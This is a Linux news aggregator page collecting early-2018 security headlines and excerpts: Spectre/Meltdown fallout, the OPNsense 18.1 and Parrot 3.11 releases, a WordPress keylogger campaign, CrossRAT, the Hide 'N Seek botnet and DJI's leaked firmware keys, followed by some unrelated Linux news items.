Language Selection

English French German Italian Portuguese Spanish

Security

Security: Updates, Intel, Taxes, Voting and WordPress

Filed under
Security
  • Security updates for Tuesday
  • House chair hits reports of Intel notifying Chinese firms about chip vulnerabilities before US

    Walden's remarks come after the Journal reported that Intel had notified a small group of companies — including Chinese firms — about Spectre and Meltdown vulnerabilities which, if exploited, allow hackers to access sensitive information stored on computers, phones and servers using Intel, AMD and ARM chips.

  • File Your Taxes Before Scammers Do It For You

    Today, Jan. 29, is officially the first day of the 2018 tax-filing season, also known as the day fraudsters start requesting phony tax refunds in the names of identity theft victims. Want to minimize the chances of getting hit by tax refund fraud this year? File your taxes before the bad guys can!

  • Voting-machine makers are already worried about Defcon

    What's worse, he added that "nearly every state is using some machines that are no longer manufactured, and many election officials struggle to find replacement parts." Before millions of electronic votes were cast for the next US president, Norden told press that "everything from software support, replacement parts and screen calibration were at risk."

    So it's no wonder voting machine makers are keen to get their gear off eBay and keep it out of the hands of white-hat hackers equally keen to expose their collective security failings.

  • More than 2,000 WordPress websites are infected with a keylogger

    The keylogger is part of a malicious package that also installs an in-browser cryptocurrency miner that's surreptitiously run on the computers of people visiting the infected sites. Data provided here, here, and here by website search service PublicWWW showed that, as of Monday afternoon, the package was running on 2,092 sites.

Security: Intel, Lenovo, and Windows

Filed under
Security

OPNsense 18.1

Filed under
Security
BSD
  • OPNsense 18.1 released

    For more than 3 years now, OPNsense is driving innovation through modularising and hardening the open source firewall, with simple and reliable firmware upgrades, multi-language support, HardenedBSD security, fast adoption of upstream software updates as well as clear and stable 2-Clause BSD licensing.

    We humbly present to you the sum of another major iteration of the OPNsense firewall. Over the second half of 2017 well over 500 changes have made it into this release, nicknamed "Groovy Gecko". Most notably, the firewall NAT rules have been reworked to be more flexible and usable via plugins, which is going to pave the way for subsequent API works on the core firewall functionality. For more details please find the attached list of changes below.

  • OPNsense 18.1 BSD Firewall/Network OS Released

    After hitting the RC phase a few weeks ago, OPNsense 18.1 has been officially released as the latest version of this pfSense-forked network/router-oriented BSD operating system.

    OPNsense 18.1 is based on FreeBSD 11.1 while pulling in the HardenedBSD security changes. OPNsense 18.1 reworks its firewall NAT rules, PHP 7.1 and jQuery 3 are powering the web interface, there is now OpenVPN multi-remote support for clients, IPv6 shared forwarding support, improvements for intrusion detection alerts, a rewritten firewall live log, reverse DNS support for insight reporting, and a variety of new plugins.

Security: Voting Safety, Intel, Windows and Linux

Filed under
Security

Security: Intel Scandals, Microsoft Patches Cause Data Loss/Corruption

Filed under
Security

Parrot 3.11 release notes

Filed under
GNU
Linux
Security

Parrot 3.11 is now available for download.

This new release introduces many improvements and security fixes compared to the previous versions. It includes by default all the spectre/meltdown security patches currently available and an updated version of the Linux 4.14 kernel.

A new car hacking menu now contains a collection of useful open source tools in the automotive industry to test real world cars or simulate CANBus networks.

Metasploit and postgresql are now patched to work flawlessly out of the box in live mode.

Other important updates include Firefox 58, increased installer stability, many updated security tools and some important graphic improvements.

Parrot Studio was reintroduced with many improvements, this special derivative of Parrot is designed for multimedia production as an improved version of Parrot Home for workstations, with many useful productivity tools pre-installed.

This release will probably be the last version of the 3.x series (except for eventual security updates), and we wanted to include some of the changes that we planned for parrot 4.x as a gift for our community.

Read more

Security: PLC, Blacksmith, Windows at NHS

Filed under
Security

  • Vulnerable industrial controls directly connected to Internet? Why not?

    As Beaumont said, "It's an open own goal." And this particular advisory doesn't stop with the PLCs. Some PLC manufacturers haven't even responded to inquiries from the DHS' National Cybersecurity and Communications Integration Center (NCCIC) about recently-discovered vulnerabilities, such as one in the Nari PCS-9611 Feeder Relay, a control system used to manage some electrical grids. The vulnerability, reported by two Kaspersky Labs researchers, "could allow a remote attacker arbitrary read/write abilities on the system."

  • Free Linux Tool Monitors Systems for Meltdown Attacks

    SentinelOne this week released Blacksmith, a free Linux tool that can detect Meltdown vulnerability exploitation attempts, so system administrators can stop attacks before they take root.

    The company has been working on a similar tool to detect Spectre vulnerability attacks.

  • Welsh NHS systems back up after computer 'chaos'

    The National Cyber Security Centre said the problems were caused by technical issues and were not the result of a cyber attack.

Security: Updates, US Senate, Malware on Social Control Media, Ubuntu 16.04.4 LTS Delay

Filed under
Security
  • Security updates for Friday
  • Senate IT Tells Staffers They're On Their Own When It Comes To Personal Devices And State-Sponsored Hackers

    Notification of state-sponsored hacking attempts has revealed another weak spot in the US government's defenses. The security of the government's systems is an ongoing concern, but the Senate has revealed it's not doing much to ensure sensitive documents and communications don't end up in the hands of foreign hackers.

    The news of the hacking attempt was greeted with assurances that nothing of value was taken.

  • Beware! Undetectable CrossRAT malware targets Windows, MacOS, and Linux systems

    According to researchers, Dark Caracal hackers do not rely on any "zero-day exploits" to distribute its malware; instead, it uses basic social engineering via posts on Facebook groups and WhatsApp messages, encouraging users to visit hackers-controlled fake websites and download malicious applications.

  • Ubuntu 16.04.4 LTS Delayed Due To Spectre & Meltdown

    Ubuntu 16.04.4 LTS had been scheduled to ship mid-February as the latest point release for this Long Term Support release, but unfortunately that is not going to happen as planned due to the Canonical kernel developers being overloaded by Spectre and Meltdown mitigation work.

    Ubuntu 16.04.4 is now being delayed by an unknown length of time, but they believe it shouldn't be more than "a few weeks" past the original 15 February ship date. They are waiting for the Spectre/Meltdown mitigation work to settle, for ensuring they are shipping qualified patches in this point release. Additionally, they have been busy with that mitigation work that they have neglected other kernel patches that may need to make it into this point release too.

Security: 'DevOps', Linux-based SkySecure, VirusTotal, DJI

Filed under
Security
  • DevOps and Security: How to Overcome Cultural Challenges and Transform to True DevSecOps

    Similar to the proliferation of mobile devices in the enterprise several years ago where organizations were feeling the pressure to have a mobile strategy but didn’t know where to start, we’re seeing the same situation with development methodologies. To accelerate development velocity, teams are feeling the pressure to “do DevOps,” and when integrating security, to “do DevSecOps.” But much like during the initial mobile wave, many companies say they’re implementing these methodologies, and might even think they are, but in reality, they’re not. Yet.

  • What does DevOps do in 2018?

    In 2018, we’re expecting DevOps to become the new norm for larger enterprise teams. This is because we’re likely to see developers on older, higher value systems implementing a more DevOps centric approach, having seen it work on projects that have traditionally been highly visible, but low value.

  • Cisco Acquires Skyport as Cyber-Security Investments Continue

    January 2018 has emerged to become a banner month for cyber-security acquisitions, with at least 10 acquisitions announced so far, four of which were announced between Jan. 22 and 25. Cisco continued the trend on Jan. 24 by announcing its intention to acquire privately-held server security startup Skyport.

    Financial terms of Cisco's Skyport acquisition are not being publicly disclosed. A Cisco spokesperson told eWEEK that the deal is expected to close in Cisco's 2018 fiscal third quarter. However,  a Cisco spokesperson said the company doesn't plan to continue marketing the existing Skyport System server security products.

    [...]

    It's the Linux-based SkySecure Server platform tied into the SkySecure Center service that further validates the integrity of firmware, BIOS, software and cryptography.

  • S for Security is Google owner Alphabet's new favorite letter

    The business will be the new home of VirusTotal, which Google acquired in 2012. Chronicle’s other story will be “a new cybersecurity intelligence and analytics platform that we hope can help enterprises better manage and understand their own security-related data.”

  • Github shrugs off drone maker DJI's crypto key DMCA takedown effort

    Github rejected a DMCA takedown request from Chinese drone-maker DJI after someone forked source code left in the open by a naughty DJI developer, The Register can reveal.

    This included AES keys permitting decryption of flight control firmware, which could allow drone fliers with technical skills to remove geofencing from the flight control software: this software prevents DJI drones from flying in certain areas such as the approach paths for airports, or near government buildings deemed to be sensitive.

    Though the released key is not for the latest firmware version, The Register has seen evidence (detailed below) that drone hackers are already incorporating it in modified firmware available for anyone to download and flash to their drones.

    DJI declined to comment for this article. Github ignored The Register's invitation to comment.

    [...]

    The code was forked by drone researcher Kevin Finisterre, who submitted a successful rebuttal to the takedown request on the grounds that Github's terms and conditions explicitly permit forking of public repos.

    "DJI mistakenly marked code repositories as public subsequently granting license for anyone to fork said repos. This accident can be evidenced by their press release," wrote Finisterre, linking to a DJI statement.

Security: Updates, Attacking Network Protocols, Hide 'N Seek, FBI, Intel, WhatsApp

Filed under
Security
  • Security updates for Thursday
  • Attacking Network Protocols

    Most of us in the Free and Open Source software world know about Wireshark and using it to capture network traffic information. This book mentions that tool, but focuses on using a different tool that was written by the author, called CANAPE.Core. Along the way, the author calls out multiple other resources for further study. I like and appreciate that very much! This is a complex topic and even a detailed and technically complex book like this one cannot possibly cover every aspect of the topic in 300 pages. What is covered is clearly expressed, technically deep, and valuable.

  • What is Hide 'N Seek? New IoT botnet uses peer-to-peer communication to infect over 20,000 devices

    "The HNS botnet communicates in a complex and decentralized manner and uses multiple anti-tampering techniques to prevent a third party from hijacking/poisoning it," Bitdefender researchers wrote in a blog post published on Wednesday (24 January). "The bot can perform web exploitation against a series of devices via the same exploit as Reaper (CVE-2016-10401 and other vulnerabilities against networking equipment)."

  • Senator Demands FBI Director Explain His Encryption Backdoor Bullshit

    "I would like to learn more about how you arrived at and justify this ill-informed policy proposal. Please provide me with a list of the cryptographers with whom you’ve personally discussed this topic since our July 2017 meeting and specifically identify those experts who advised you that companies can feasibly design government access features into their products without weakening cybersecurity. Please provide this information by February 23, 2018."

  • Intel's plan to fix Meltdown in silicon raises more questions than answers

    Why this matters: Intel has been busy working with PC makers and OS vendors like Microsoft to release microcode that includes so-called mitigations, microcode updates that patch the vulnerabilities. But even that hasn’t gone so well: Intel advised end users to stop applying patches after systems unexpectedly rebooted. Now, Intel has revealed it’s working on a more permanent fix, but the impact on users remains unknown.

  • WhatsApp Vulnerability
Syndicate content

More in Tux Machines

Linux: To recurse or not

Linux and recursion are on very good speaking terms. In fact, a number of Linux command recurse without ever being asked while others have to be coaxed with just the right option. When is recursion most helpful and how can you use it to make your tasks easier? Let’s run through some useful examples and see. Read more

Today in Techrights

Android Leftovers

today's leftovers

  • MX Linux Review of MX-17 – For The Record
    MX Linux Review of MX-17. MX-17 is a cooperative venture between the antiX and former MEPIS Linux communities. It’s XFCE based, lightning fast, comes with both 32 and 64-bit CPU support…and the tools. Oh man, the tools available in this distro are both reminders of Mepis past and current tech found in modern distros.
  • Samsung Halts Android 8.0 Oreo Rollouts for Galaxy S8 Due to Unexpected Reboots
    Samsung stopped the distribution of the Android 8.0 Oreo operating system update for its Galaxy S8 and S8+ smartphones due to unexpected reboots reported by several users. SamMobile reported the other day that Samsung halted all Android 8.0 Oreo rollouts for its Galaxy S8/S8+ series of Android smartphones after approximately a week since the initial release. But only today Samsung published a statement to inform user why it stopped the rollouts, and the cause appears to be related to a limited number of cases of unexpected reboots after installing the update.
  • Xen Project Contributor Spotlight: Kevin Tian
    The Xen Project is comprised of a diverse set of member companies and contributors that are committed to the growth and success of the Xen Project Hypervisor. The Xen Project Hypervisor is a staple technology for server and cloud vendors, and is gaining traction in the embedded, security and automotive space. This blog series highlights the companies contributing to the changes and growth being made to the Xen Project and how the Xen Project technology bolsters their business.
  • Initial Intel Icelake Support Lands In Mesa OpenGL Driver, Vulkan Support Started
    A few days back I reported on Intel Icelake patches for the i965 Mesa driver in bringing up the OpenGL support now that several kernel patch series have been published for enabling these "Gen 11" graphics within the Direct Rendering Manager driver. This Icelake support has been quick to materialize even with Cannonlake hardware not yet being available.
  • LunarG's Vulkan Layer Factory Aims To Make Writing Vulkan Layers Easier
    Introduced as part of LunarG's recent Vulkan SDK update is the VLF, the Vulkan Layer Factory. The Vulkan Layer Factory aims to creating Vulkan layers easier by taking care of a lot of the boilerplate code for dealing with the initialization, etc. This framework also provides for "interceptor objects" for overriding functions pre/post API calls for Vulkan entry points of interest.